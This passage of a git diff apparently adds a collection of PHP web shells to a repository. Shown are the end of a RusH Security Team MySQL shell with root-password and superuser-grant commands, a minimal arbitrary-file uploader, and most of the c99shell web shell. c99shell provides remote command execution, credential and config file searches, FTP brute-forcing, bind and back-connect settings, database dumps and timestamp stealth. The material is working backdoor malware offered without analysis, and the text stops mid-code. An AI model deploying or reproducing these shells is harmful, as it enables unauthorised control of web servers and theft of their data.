+   $fp = fopen($file, "w"); 
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+$dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+unlink($file);
+}
+/*-------------END! �������� ������ �������--------------*/
+
+print "
+   </td>
+ </tr>
+</table>
+           </td>
+         </tr>
+       </table>";
+}
+
+/*------------------------ END R I G H T   B L O C K ! -----------------------*/
+/*���������� php*/
+if (isset($php) && $php=='ok'){
+phpinfo();
+}
+if (isset($q_help) && $q_help=='ok'){
+ print '���� HELP �� ��������
+ <li><b>SHOW TABLES </b> ������� ������ ������ ����
+ <li><b>SHOW OPEN TABLES</b> ������� ������ ������, ������� � ��������� ������ ������� � ���� �������
+ <li><b>SHOW TABLE STATUS</b> ��������� ������ ����
+ <li><b>SELECT VERSION(), CURRENT_DATE</b> ������� ������ MySQL ������� � ������� ����
+ <li><b>SELECT (2*2), (4+1)*5, (9/3), (5-3)</b> ���������� MySQL ��� �����������: ��������� ����� ������� �������������� ��������
+ <li><b>DROP TABLE IF EXISTS table_name</b> ������� ������� \"table_name\"
+ <li><b>CREATE TABLE bar (m INT)</b> ������� ������� bar � ����� �������� (m) ���� integer
+ <li><b>CREATE TABLE test (number INTEGER,texts CHAR(10));</b> ������� ������� test � ������ number -��� INTEGER � ���� texts -��� CHAR
+ <li><b>CREATE TABLE `test` SELECT * FROM `rush`;</b> ������� ������� test ,������� ������� rush
+ <li><b>ALTER TABLE test CHANGE SITE OLD_SITE INTEGER</b> ������������� ������� INTEGER �� SITE � OLD_SITE
+ <li><b>ALTER TABLE test RENAME rush</b> ������������� ������� test � rush
+ <li><b>UPDATE mysql.user SET Password=PASSWORD(\'new_passwd\') WHERE user=\'root\'</b> ������� ����� root ������
+ <li><b>FLUSH PRIVILEGES</b> ���������� ������� ���������� ������
+ <li><b>GRANT ALL PRIVILEGES ON *.* TO rst@localhost IDENTIFIED BY \'some_pass\' WITH GRANT OPTION</b> �������� ������ �����-����� mysql <b>rst</b> � ������� <b>some_pass</b>
+ ';
+
+}
+
+print "
+   </td>
+ </tr>
+</table>
+
+</td></tr>
+<tr><td>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table>";
+
+?>
diff --git a/xakep-shells/PHP/uploader.php.php.txt b/xakep-shells/PHP/uploader.php.php.txt
new file mode 100644
index 0000000..f2f2179
--- /dev/null
+++ b/xakep-shells/PHP/uploader.php.php.txt
@@ -0,0 +1,9 @@
+<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST">
+<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
+Send this file: <INPUT NAME="userfile" TYPE="file">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<?
+move_uploaded_file($userfile, "entrika.php"); 
+?>
+
diff --git a/xakep-shells/PHP/w.php.php.txt b/xakep-shells/PHP/w.php.php.txt
new file mode 100644
index 0000000..cd63ef0
--- /dev/null
+++ b/xakep-shells/PHP/w.php.php.txt
@@ -0,0 +1,2653 @@
+<?php
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "1.0 pre-release build #17"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+//Authentication
+$login = ""; //login
+//DON'T FORGOT ABOUT PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
+
+$gzipencode = TRUE; //Encode with gzip?
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+
+$donated_html = "<center><b>donated_html</b></center>";
+/* If you publish free shell and you wish
+add link to your site or any other information,
+put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "prozente@gmail.com"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+0 - files and folders (as default),
+1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if TRUE and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+ // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+$usefsbuff = TRUE; //Buffer-function
+$copy_unset = FALSE; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Back]</b>","#\" onclick=\"history.back(1)"),
+ array("<b>[Forward]</b>","#\" onclick=\"history.go(1)"),
+ array("<b>[UPDIR]</b>",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<b>[Refresh]</b>",""),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Buffer]</b>",$surl."act=fsbuff&d=%d"),
+ array("<b>[Encoder]</b></b>",$surl."act=encoder&d=%d"),
+ array("<b>[Tools]</b>",$surl."act=tools&d=%d"),
+ array("<b>[Proc.]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP brute]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Sec.]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL]</b>",$surl."act=sql&d=%d"),
+ array("<b>[PHP-code]</b>",$surl."act=eval&d=%d"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Logout]</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return FALSE;}
+}
+}
+
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "� <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
